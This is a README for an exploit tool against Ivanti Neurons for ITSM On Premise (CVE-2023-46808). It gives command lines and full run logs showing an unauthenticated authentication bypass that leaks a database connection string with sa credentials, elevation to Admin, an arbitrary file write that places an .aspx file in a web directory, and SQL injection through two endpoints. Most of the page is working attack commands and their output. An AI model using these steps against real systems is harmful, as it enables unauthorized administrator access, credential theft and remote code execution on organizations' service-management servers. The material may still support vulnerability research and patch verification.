Skip to content

Latest commit

 

History

History
107 lines (89 loc) · 5.26 KB

README.md

File metadata and controls

107 lines (89 loc) · 5.26 KB

Exploits for Ivanti Neurons for ITSM (On Premise)

This script exploits several flaws that allow an unauthenticated attacker to gain administrator access and execute remote commands (CVE-2023-46808) on Ivanti Neurons for ITSM (On Premise).

For technical details, see Technical Details

Affected versions

Versions 2021.1.0.2021060601 to 2020.4.0.2021033001 are affected, and anterior versions are likely to be vulnerable as well.

Usage

Install requirements:

pip install requests defusedxml

List tenants

python3 ivanti-itsm-exploit.py  -u http://<target> --list-tenants
[2025-08-10 21:04:18] [*] Listing tenants: http://<target>/HEAT/
[2025-08-10 21:04:18] [*] [+] Tenants found:
- CentralConfig
- WIN-ITSM

Authentication Bypass

python3 ivanti-itsm-exploit.py -v  -u http://<target> -t WIN-ITSM --auth-bypass

[2025-08-10 21:07:43] [*] Bypassing authentication: http://<target>/HEATSurveyProxy/SaaSSurvey.asmx
HTTP RESPONSE:
<?xml version="1.0" ?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
	<soap:Body>
		<AuthenticateAPIResponse xmlns="http://www.frontrange.com/WebSurvey/">
			<AuthenticateAPIResult>
				<TenantId>WIN-ITSM</TenantId>
				<LoginId>HEATAdmin</LoginId>
				<SessionId>OMJC56DSECOCHU6UT9SKGVLP0VLF00U6</SessionId>
				<ConnectionString>server=WIN-ITSM;Integrated Security=False;MultipleActiveResultSets=True;user id=sa;password=Password123;initial catalog=HEATSM</ConnectionString>
				<ProviderName>System.Data.SqlClient</ProviderName>
				<UseServerTimeZone>false</UseServerTimeZone>
				<SessionKey>WIN-ITSM#OMJC56DSECOCHU6UT9SKGVLP0VLF00U6#1</SessionKey>
				<SessionKeyExpire>638915620626330227</SessionKeyExpire>
				<AuthenticationStatus>Success</AuthenticationStatus>
			</AuthenticateAPIResult>
		</AuthenticateAPIResponse>
	</soap:Body>
</soap:Envelope>

[2025-08-10 21:07:43] [+] Database connection string found: server=WIN-ITSM;Integrated Security=False;MultipleActiveResultSets=True;user id=sa;password=Password123;initial catalog=HEATSM
[2025-08-10 21:07:43] [+] Session key (SID) found: WIN-ITSM#OMJC56DSECOCHU6UT9SKGVLP0VLF00U6#1
[2025-08-10 21:07:43] [*] Add Admin role to session: http://<target>/HEAT/Services/Session.asmx/SelectRole
[2025-08-10 21:07:43] [+] Current role: Admin
[2025-08-10 21:07:43] [+] CSRF Token: lbDMPZLNUCjRdF9tlN8Vry3kr1o

Remote arbitrary file write

python3 ivanti-itsm-exploit.py -v  -u http://<target> -t WIN-ITSM --auth-bypass upload --file a
[...]
[2025-08-10 21:08:55] [*] Add Admin role to session: http://<target>/HEAT/Services/Session.asmx/SelectRole
[2025-08-10 21:08:55] [+] Current role: Admin
[2025-08-10 21:08:55] [+] CSRF Token: GOjTQIMGuCIwjDEXaw2eU-H_tao
[2025-08-10 21:08:55] [*] Adding file in database
HTTP RESPONSE:
<textarea>{"success":true,"msg":"Your file has been uploaded"}</textarea>
[2025-08-10 21:08:55] [*] Writing file connection id: 95489760790959413597285398825941
HTTP RESPONSE:
{"d":null}
[2025-08-10 21:08:55] [*] Checking file path
HTTP RESPONSE:
{"d":"C:\\\\\\\\Program Files\\\\\\\\HEAT Software\\\\\\\\HEAT\\\\\\\\AppServer\\\\\\\\Input\\WIN-ITSM\\"}
[2025-08-10 21:08:55] [+] Success ! File written at: C:\\\\Program Files\\\\HEAT Software\\\\HEAT\\\\AppServer\\\\Input\WIN-ITSM\
[2025-08-10 21:08:55] [+] File URL: /HEAT/Input/WIN-ITSM/Default.aspx

SQL injection

python3 ivanti-itsm-exploit.py -v  -u http://<target> -t WIN-ITSM --auth-bypass sqli-package --sql "SELECT * from master..syslogins WAITFOR DELAY '0:0:20';"
[...]
[2025-08-10 21:13:37] [*] Add Admin role to session: http://<target>/HEAT/Services/Session.asmx/SelectRole
[2025-08-10 21:13:37] [+] Current role: Admin
[2025-08-10 21:13:37] [+] CSRF Token: 74652LoPMbH3uy0Rf42lSDn2aoE
[2025-08-10 21:13:37] [*] Exploiting PackageImportHandler.ashx SQLI : http://<target>/HEAT/AdminUI/handlers/PackageImportHandler.ashx
[2025-08-10 21:13:57] [+] Success ! HTTP RESPONSE:
<html><body>{"completed":true,"applied":true,"errors":[],"warnings":[]}<body></html>

Use ITSM as a client for a remote database:

python3 ivanti-itsm-exploit.py -v  -u http://<target> -t WIN-ITSM --auth-bypass sqli-asset --sql "master..syslogins WAITFOR DELAY '0:0:10'--" -u sa -p Password123 -s WIN-ITSM -d ConfigDB
[...]
[2025-08-10 21:14:27] [+] Session key (SID) found: WIN-ITSM#2OK3EV6F3F73L1KM3A0R0G3S5UA05VHR#1
[2025-08-10 21:14:27] [*] Add Admin role to session: http://<target>/HEAT/Services/Session.asmx/SelectRole
[2025-08-10 21:14:27] [+] Current role: Admin
[2025-08-10 21:14:27] [+] CSRF Token: fnNhibelOJoOxaTihGUd9PG4vXM
[2025-08-10 21:14:27] [*] Exploiting GetAssetXML SQLI : http://<target>/HEAT/AdminUI/services/IntegrationNew.asmx/GetAssetXML
[2025-08-10 21:14:37] [+] Success ! HTTP RESPONSE:
{"d":"Preview failed - SCCMTransformer.GetKeys - Failed to retrieve random key value from SCCM serverSystem.IndexOutOfRangeException: 1\r\n   at System.Data.ProviderBase.FieldNameLookup.GetOrdinal(String fieldName)\r\n   at System.Data.SqlClient.SqlDataReader.GetOrdinal(String name)\r\n   at System.Data.SqlClient.SqlDataReader.get_Item(String name)\r\n   at FrontRange.Integration.Adapter.Container.SCCMContainerBase.GetRandomKey(SCCMAdapterConnectionDef connectionDef)"}